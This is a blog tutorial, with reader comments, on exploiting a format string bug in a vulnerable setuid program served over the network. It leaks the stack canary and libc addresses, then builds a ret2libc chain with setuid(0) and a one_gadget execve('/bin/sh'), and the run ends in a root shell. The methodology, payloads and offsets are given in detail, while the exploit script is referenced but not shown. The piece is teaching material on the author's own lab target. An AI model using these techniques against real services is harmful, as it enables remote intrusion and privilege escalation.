Format String Exploits: Defeating Stack Canary, NX and ASLR Remotely on 64 bit



Hey. Welcome back. Last time we learned how to bypass 'nx' bit by making stack executable again with functions like mprotect() and executed our shellcode. This time we will learn about new type of vulnerability than our usual stack overflows. Format string vulnerabilities seem very innocent at first but can provide lot of critical information at attacker's disposal. We will develop a remote exploit and defeat stack canary, nx bit and ASLR.


Let's dive into a simple example. A simple program. It first asks for user's name and then a secret code. It can then verify or do something else with it but for now we will only focus on above part only. You can clearly see a buffer overflow vulnerability gets function for secret code. There could be a read function with improper bound checks too. No buffering for stdin and stdout is set with setvbuf function as we will serve this program over a network. Did you notice 'printf(name);' on line 21 of code ? Seems a lazy programmer's mistake. It directly prints the buffer pointed by name without format strings. It seems so innocent but what will be the behavior if we provide some format strings to name instead ? Let's check out. First compile the code. We are using a 64 bit system and this time we will keep all default protection mechanisms and ASLR on, so no extra flags required. And on target server setuid root permissions to it.
virtual@mecha:~$ gcc format.c -o format
virtual@mecha:~$ sudo chown root format
virtual@mecha:~$ sudo chmod +s format
Now we will serve it on a port with this command.
virtual@mecha:~$ socat tcp-listen:5555,reuseaddr,fork, exec:"./format"
It listens on tcp port 5555 and whenever a connection is made, it executes "./format". You can check by connecting to server with netcat or telnet on port 5555.
virtual@mecha:~$ nc 192.168.1.4 5555
What is your name?
Name: Attacker
Hello Attacker
Enter secret code !
Code: s3cr3tc0d3
Entered Command centre with code > s3cr3tc0d3 .
Great it's working over network. Let's pass some format strings to name. I have passed '%lx-' 15 times.
virtual@mecha:~$ nc 192.168.1.4 5555
What is your name?
Name: %lx-%lx-%lx-%lx-%lx-%lx-%lx-%lx-%lx-%lx-%lx-%lx-%lx-%lx-%lx
Hello 7ffeae3fd1b0-7f69459f8720-0-7f6945bde4c0-7f6945bde4c0-2d786c252d786c25-2d786c252d786c25-2d786c252d786c25-2d786c252d786c25-2d786c252d786c25-2d786c252d786c25-2d786c252d786c25-a786c25-7ffeae3ff980-9a7b045172d7ef00
Enter secret code !
Code: s3cr3tc0d3
Entered Command centre with code > s3cr3tc0d3 .
What are those weird hexadecimal characters ?  Also '2d786c25' has repeated 15 times. If you look up ASCII table, it is hex for '%lx-'. It means format string has printed out the contents of stack to us. There are some addresses leaked too. You can verify it by loading the program in gdb and dumping stack. Here '%lx' is used for long hexadecimal as this is 64 bit and '-' is used to separate the output. In this article we will focus on using those leaked addresses to find libc base address and try to leak stack canary. We will then use this leaked memory to do a successful return to libc by overflowing the buffer while entering secret code.  Let's load program in gdb and analyze.
virtual@mecha:~$ gdb format -q
Reading symbols from format...(no debugging symbols found)...done.
gdb-peda$ checksec
CANARY    : ENABLED
FORTIFY   : disabled
NX        : ENABLED
PIE       : ENABLED
RELRO     : Partial
gdb-peda$ aslr
ASLR is OFF
gdb-peda$ disas center 
Dump of assembler code for function center:
   0x0000000000000815 <+0>: push   rbp
   0x0000000000000816 <+1>: mov    rbp,rsp
   0x0000000000000819 <+4>: sub    rsp,0x90
   0x0000000000000820 <+11>: mov    rax,QWORD PTR fs:0x28
   0x0000000000000829 <+20>: mov    QWORD PTR [rbp-0x8],rax
   0x000000000000082d <+24>: xor    eax,eax
   0x000000000000082f <+26>: lea    rdi,[rip+0x1b2]        # 0x9e8
   0x0000000000000836 <+33>: mov    eax,0x0
   0x000000000000083b <+38>: call   0x6e0 <printf@plt>
   0x0000000000000840 <+43>: lea    rax,[rbp-0x90]
   0x0000000000000847 <+50>: mov    rdi,rax
   0x000000000000084a <+53>: mov    eax,0x0
   0x000000000000084f <+58>: call   0x710 <gets@plt>
   0x0000000000000854 <+63>: lea    rax,[rbp-0x90]
   0x000000000000085b <+70>: mov    rsi,rax
   0x000000000000085e <+73>: lea    rdi,[rip+0x1a3]        # 0xa08
   0x0000000000000865 <+80>: mov    eax,0x0
   0x000000000000086a <+85>: call   0x6e0 <printf@plt>
   0x000000000000086f <+90>: nop
   0x0000000000000870 <+91>: mov    rax,QWORD PTR [rbp-0x8]
   0x0000000000000874 <+95>: xor    rax,QWORD PTR fs:0x28
   0x000000000000087d <+104>: je     0x884 <center+111>
   0x000000000000087f <+106>: call   0x6d0 <__stack_chk_fail@plt>
   0x0000000000000884 <+111>: leave  
   0x0000000000000885 <+112>: ret    
End of assembler dump.
gdb-peda$ b *center +95
Breakpoint 1 at 0x874
As you can see most memory protections like stack canary, nx bit are on. We will keep ASLR disabled in gdb for now so that we can analyze easily. We have verified format string vulnerability in name. Let's check the buffer overflow and stack canary in code. Disassemble the center function. and set breakpoint at *center +95, as it verifies the stack canary here and then decides to call stack_check_fail function.

Stack Canaries

Stack canaries are just random bytes placed after the buffer and checked before function returns. If a buffer overflow occurs then stack canary is overwritten, hence the stack check fails and exception is raised. Stack canaries usually end with null bytes to make exploitation difficult. We don't have to worry about null bytes in gets function. We will try to find stack canary by format string vulnerability here. You can try to bruteforce it on 32 bit systems too. It won't really be feasible to bruteforce on 64 bit. Run the program with format strings and let's fill the code buffer completely with 128 'A's.
gdb-peda$ r
Starting program: /home/archer/compiler_tests/format 
What is your name?
Name: %lx-%lx-%lx-%lx-%lx-%lx-%lx-%lx-%lx-%lx-%lx-%lx-%lx-%lx-%lx-
Hello 7ffec094b550-7fbb5533a720-0-7fbb555204c0-7fbb555204c0-2d786c252d786c25-2d786c252d786c25-
2d786c252d786c25-2d786c252d786c25-2d786c252d786c25-2d786c252d786c25-2d786c252d786c25-a2d786c25-
7ffec094dd20-7068c9a76fdc1c00-
Enter secret code !
Code: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Entered Command center with code > AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA .
[----------------------------------registers-----------------------------------]
RAX: 0x7068c9a76fdc1c00 
RBX: 0x0 
RCX: 0x0 
RDX: 0x7fbb5533a720 --> 0x0 
RSI: 0x7ffec094b4b0 ("Entered Command center with code > ", 'A' , " .\n94b550-7fbb5533a720-0-7fbb555204c0"...)
RDI: 0x0 
RBP: 0x7ffec094dbe0 --> 0x7ffec094dc40 --> 0x555aec917960 (<__libc_csu_init>: push   r15)
RSP: 0x7ffec094db50 ('A' )
RIP: 0x555aec917874 (<center+95>: xor    rax,QWORD PTR fs:0x28)
R8 : 0x7fbb555204c0 (0x00007fbb555204c0)
R9 : 0x7ffec094af60 --> 0x0 
R10: 0x0 
R11: 0x246 
R12: 0x555aec917730 (<_start>: xor    ebp,ebp)
R13: 0x7ffec094dd20 --> 0x1 
R14: 0x0 
R15: 0x0
EFLAGS: 0x206 (carry PARITY adjust zero sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x555aec91786a <center+85>: call   0x555aec9176e0 <printf@plt>
   0x555aec91786f <center+90>: nop
   0x555aec917870 <center+91>: mov    rax,QWORD PTR [rbp-0x8]
=> 0x555aec917874 <center+95>: xor    rax,QWORD PTR fs:0x28
   0x555aec91787d <center+104>: je     0x555aec917884 <center+111>
   0x555aec91787f <center+106>: call   0x555aec9176d0 <__stack_chk_fail@plt>
   0x555aec917884 <center+111>: leave  
   0x555aec917885 <center+112>: ret
[------------------------------------stack-------------------------------------]
0000| 0x7ffec094db50 ('A' )
0008| 0x7ffec094db58 ('A' )
0016| 0x7ffec094db60 ('A' )
0024| 0x7ffec094db68 ('A' )
0032| 0x7ffec094db70 ('A' )
0040| 0x7ffec094db78 ('A' )
0048| 0x7ffec094db80 ('A' )
0056| 0x7ffec094db88 ('A' )
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value

Breakpoint 1, 0x0000555aec917874 in center ()
Stack canary i.e. '0x7068c9a76fdc1c00' is stored in rax register then checked. And if you notice the memory dumped by our format string the last value is actually our stack canary. Yeah. We leaked stack canary. First problem solved. Now for bypassing NX bit, we will do return to libc. But as ASLR will be on. We need to find libc base address every time. To solve this we will use the addresses leaked by format string. You can leak such addresses to find approx position of your shellcode too.
gdb-peda$ vmmap
Start              End                Perm Name
0x00007fbb54f82000 0x00007fbb55135000 r-xp /usr/lib/libc-2.27.so
If you look carefully at the dumped addresses, you can notice some are from libc. They must have been loaded on stack when required by some functions. They must be pointing to specific functions in libc, so whenever u run the program they will always be same. Even when ASLR is on, only the addresses will change but they will still point to same function. That means they have same offset from libc base every time. We can take one of these address, calculate it's offset from libc base and use that offset every time to find libc base. Time to set aslr on and find offset to libc base.
gdb-peda$ aslr on
gdb-peda$ aslr
ASLR is ON
gdb-peda$ r
Starting program: /home/archer/compiler_tests/format 
What is your name?
Name: %lx-%lx-%lx-%lx-%lx-%lx-%lx-%lx-%lx-%lx-%lx-%lx-%lx-%lx-%lx 
Hello 7ffe72f66210-7fc16bb5a720-0-7fc16bd404c0-7fc16bd404c0-2d786c252d786c25-2d786c252d786c25-2d786c252d786c25-2d786c252d786c25-2d786c252d786c25-2d786c252d786c25-2d786c252d786c25-a786c25-7ffe72f689e0-87f4107dcd08200
Enter secret code !
Code: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Entered Command center with code > AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA .
[----------------------------------registers-----------------------------------]
RAX: 0x87f4107dcd08200 
RBX: 0x0 
RCX: 0x0 
RDX: 0x7fc16bb5a720 --> 0x0 
RSI: 0x7ffe72f66170 ("Entered Command center with code > ", 'A' , " .\nf66210-7fc16bb5a720-0-7fc16bd404c0"...)
RDI: 0x0 
RBP: 0x7ffe72f688a0 --> 0x7ffe72f68900 --> 0x5581705e8960 (<__libc_csu_init>: push   r15)
RSP: 0x7ffe72f68810 ('A' )
RIP: 0x5581705e8874 (<center+95>: xor    rax,QWORD PTR fs:0x28)
R8 : 0x7fc16bd404c0 (0x00007fc16bd404c0)
R9 : 0x7ffe72f65c20 --> 0x0 
R10: 0x0 
R11: 0x246 
R12: 0x5581705e8730 (<_start>: xor    ebp,ebp)
R13: 0x7ffe72f689e0 --> 0x1 
R14: 0x0 
R15: 0x0
EFLAGS: 0x202 (carry parity adjust zero sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x5581705e886a <center+85>: call   0x5581705e86e0 <printf@plt>
   0x5581705e886f <center+90>: nop
   0x5581705e8870 <center+91>: mov    rax,QWORD PTR [rbp-0x8]
=> 0x5581705e8874 <center+95>: xor    rax,QWORD PTR fs:0x28
   0x5581705e887d <center+104>: je     0x5581705e8884 <center+111>
   0x5581705e887f <center+106>: call   0x5581705e86d0 <__stack_chk_fail@plt>
   0x5581705e8884 <center+111>: leave  
   0x5581705e8885 <center+112>: ret
[------------------------------------stack-------------------------------------]
0000| 0x7ffe72f68810 ('A' )
0008| 0x7ffe72f68818 ('A' )
0016| 0x7ffe72f68820 ('A' )
0024| 0x7ffe72f68828 ('A' )
0032| 0x7ffe72f68830 ('A' )
0040| 0x7ffe72f68838 ('A' )
0048| 0x7ffe72f68840 ('A' )
0056| 0x7ffe72f68848 ('A' )
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value

Breakpoint 1, 0x00005581705e8874 in center ()
gdb-peda$ vmmap
Start              End                Perm Name
0x00007fc16b7a2000 0x00007fc16b955000 r-xp /usr/lib/libc-2.27.so
I am choosing the 4th address which seems to be from libc and calculate it's offset from libc base.
0x7fc16bd404c0-0x00007fc16b7a2000 = 0x59e4c0
Cool. This offset will always be same for the 4th address. Now you can find offset to stack canary and return address either by direct stack dump or a pattern.
0x7ffe72f68870: 0x4141414141414141 0x4141414141414141
0x7ffe72f68880: 0x4141414141414141 0x4141414141414141
0x7ffe72f68890: 0x0000000000000000 0x087f4107dcd08200  <== canary
0x7ffe72f688a0: 0x00007ffe72f68900 0x00005581705e893d  <== return address
virtual@mecha:~$ /opt/metasploit/tools/exploit/pattern_offset.rb -q 0x3765413665413565
[*] Exact match at offset 136
It turned out to be 136 for stack canary and 152 for return address on my system. So the layout is
code = 'A'*136 + canary(8) + 'B'*8 + return_address(8)
Put your glasses on, it's time to make remote exploit.


Since we are serving the program over a network, I will simply use telnetlib in python to connect and interact with it. You can use pwntools library too, but for simplicity I'm just using telnetlib. You can read more on pwntools here. We will see more on pwntools in future. So our strategy will be first to send format strings then read output and extract libc address and stack canary. Then calculate libc base from the address and generate a return to libc payload. We will call setuid(0); first, as we know modern systems drop privileges when not required in setuid binaries. Since this is 64 bit we will pop 0x0 to rdi register and it will be passed to setuid. Also for executing '/bin/sh', I'm simply using one_gadget execve. You can use this tool to find one_gadget or install it simply with $ gem install one_gadget. One thing we are assuming here is that we know the libc version of the target and crafting return to libc according to that. But when you don't know the libc version, you may try to leak some more memory and try to find some offsets according to dumped addresses. Also you may look up online libc databases to better find the target libc version. One thing you can notice is last 3 digits in libc address are always '000' so, the offset's last 3 digits will also be same. This will be even easier in 32 bit as addresses are smaller. We can also leak addresses from Global Offset Table. A cool place to search is libc.blukat.me and libcdb.com. Also I found a repository with big database of libc's here. We will learn more on using such leaks and more ways to leak in next articles.
virtual@mecha:~$ one_gadget /usr/lib/libc.so.6
0x43b88 execve("/bin/sh", rsp+0x30, environ)
constraints:
  rax == NULL

0x43bdc execve("/bin/sh", rsp+0x30, environ)
constraints:
  [rsp+0x30] == NULL

0xe49c0 execve("/bin/sh", rsp+0x60, environ)
constraints:
  [rsp+0x60] == NULL
You can find more ROP gadgets with ROPgadget or Ropper tool. And find offset to setuid.
virtual@mecha:~$ readelf -a /usr/lib/libc.so.6 | grep setuid
    23: 00000000000c67a0   145 FUNC    WEAK   DEFAULT   12 setuid@@GLIBC_2.2.5
  1604: 0000000000000000     0 FILE    LOCAL  DEFAULT  ABS setuid.c
  5134: 00000000000c67a0   145 FUNC    LOCAL  DEFAULT   12 __setuid
  5878: 00000000000c67a0   145 FUNC    WEAK   DEFAULT   12 setuid
Compiling everything together, here's my simple exploit code. I have commented each line with explaination. Here's how the stack layout will be after exploit.


Run it.
virtual@mecha:~$ python2 format.py                          
Enter this command to setup a server. 5555 is port !
 $ socat tcp-listen:5555,fork, exec:'./format'

[i] Enter target ip (localhost): 192.168.43.204
[i] Enter target port (5555): 5555
[i] Connecting to server
What is your name?
Name:
[' Hello 7ffdec247930', '7fb462c49720', '0', '7fb462e2f4c0', '7fb462e2f4c0', '2d786c252d786c25', '2d786c252d786c25', '2d786c252d786c25', '2d786c252d786c25', '2d786c252d786c25', '2d786c252d786c25', '2d786c252d786c25', '2d786c25', '7ffdec24a100', '3fe25b5b8083e400', 'Enter secret code !\nCode:']
[+] Found Stack Canary   : 0x3fe25b5b8083e400
[+] Calculated Libc base : 0x7fb462891000
[i] Payload generated
 Entered Command center with code > AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA .
[+] Shell ready. Enter commands !

uid=0(root) gid=1000(virtual) groups=1000(virtual),10(wheel)
whoami
root
pwd
/home/virtual/
Awesome. We wrote a remote expolit and as the service was running as root, we got root privileges.


Well, that's all for now. In next articles we will learn more about GOT and PLT, how powerful format strings exploits can be, and more exploitaitons techniques. Keep practicing.

For any queries contact : @ShivamShrirao

Next Read: Return to PLT, GOT to bypass ASLR remotely

Comments

  1. Can you please help me out with the following situation?

    When i executed format.py i could get the stack canary , calculated libc ,payload value and could reach till this line [+] Shell ready. Enter commands ! -in my output , but could not get the remote connection to the machine.
    When I executed my format.py file and when it reaches this this line [+] Shell ready. Enter commands !--its displays that connection closed from the server.
    Not sure what I missed. I did find one_gadget, pop_rdi and setUid values for my system.
    Also that I could not understand why are we using metasploit and what is pattern_offset.rb doing in the below mentioned command?
    "/opt/metasploit/tools/exploit/pattern_offset.rb -q 0x3765413665413565"
    In the above command I am not sure how are you generating this value -"0x3765413665413565".

    Your timely response would be highly appreciated.

    Looking forward for your response.

    Thanks,
    Varsha

    ReplyDelete
    Replies
    1. Regarding metasploit, I am using that to create a long pattern, So when the buffer overflow occurs registers/memory is overwritten, I can see what pattern it is overwritten by and calculate offset easily instead of trying with different lengths. You can read more about it here https://www.ret2rop.com/2018/08/stack-based-buffer-overflow-x64.html

      Regarding exploit failing I think most likely your one_gadget isn't working. Sometimes it happens when registers don't have correct value. Try few other one_gadgets, or u can make execve('/bin/sh') or system('sh') chain. I have explained that in some of my other articles. Also to be sure do try attaching the target program to gdb and checking the exploit execution step by step.

      Delete
  2. when i use the exact same code i don´t get the Library addresses leaked. Did something change in terms of security on Ubuntu or am i doing somethin wrong?

    My Result:
    What is your name?
    Name: %lx-%lx-%lx-%lx-%lx-%lx-%lx-%lx-%lx-%lx-%lx-%lx-%lx-%lx-%lx-%lx
    Hello 7fff52dd39d0-0-0-6-6-2d786c252d786c25-2d786c252d786c25-2d786c252d786c25-2d786c252d786c25-2d786c252d786c25-2d786c252d786c25-2d786c252d786c25-a786c252d786c25-7fff52dd61b0-8e04e06c68602600-0
    �a�R�Enter secret code !
    Code: gfdfdfdf
    Entered Command center with code > gfdfdfdf .

    ReplyDelete
    Replies
    1. In your results I can see the addresses are leaked. These are some random left over addresses and memory on the stack. So they may or may not contain libc address at the exact place as they mostly don't have any particular order.
      There are some starting with "7fff" in your dump, they may be from libc, you have to check if they are in range by comparing with range of libc addresses from "vmmap" command.
      If not you may have to try longer sequences to dump more memory and also try indexing the format strings as I have discussed in next articles till you find some useful addresses. Btw I recommend using "%p" instead of "%lx", so your payloads will be shorter.

      Delete
  3. What part of exploit exactly are you facing the problem ? Also while debugging it is better to first turn off the ASLR so that addresses don't change and then you can turn it on once you can do it with aslr off.

    ReplyDelete
  4. If you disable ASLR, the addresses will remain the same so you don't have to calculate again and again. You can also debug while using the exploit script by `at`taching to the server process with gdb.

    ReplyDelete
  5. First run the server and connect to it. Don't send any data. Start gdb as root and find the pid of the server process. Then enter `at pid` in gdb, replace pid with pid of process. Then u can debug the running process. Setup breakpoints and enter `c`ontinue.

    ReplyDelete
  6. If you are attaching to the process you can just send input through your python script, like the final exploit script I am using in the article.

    ReplyDelete
  7. You can send input through your already established netcat connection.

    ReplyDelete
  8. Type or pipe into that netcat connection.
    Or
    Connect with telnet/sockets in python like my exploit script and send input through that connection.

    ReplyDelete
  9. Run the script. Connect script to server. A buf process is spawned asking for input. Do not send input from script. Attach to that process in gdb. Set breakpoints, continue. Then continue the script and send the input.

    Btw with some bash tricks pipes can also dynamically send input but I would suggest just stick to the script.

    ReplyDelete
  10. If you know python you know you can edit the script to do whatever you want it to do ?

    ReplyDelete
  11. Excellent article! Question - Does having ASLR on affect leaked information via format string? When ASLR is on, I get less output from e.g. %p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p... than I do when ASLR is off. When ASLR Is on, it shows `(nil)` for many addresses. Is there some other anti-format string protection?

    ReplyDelete

Post a Comment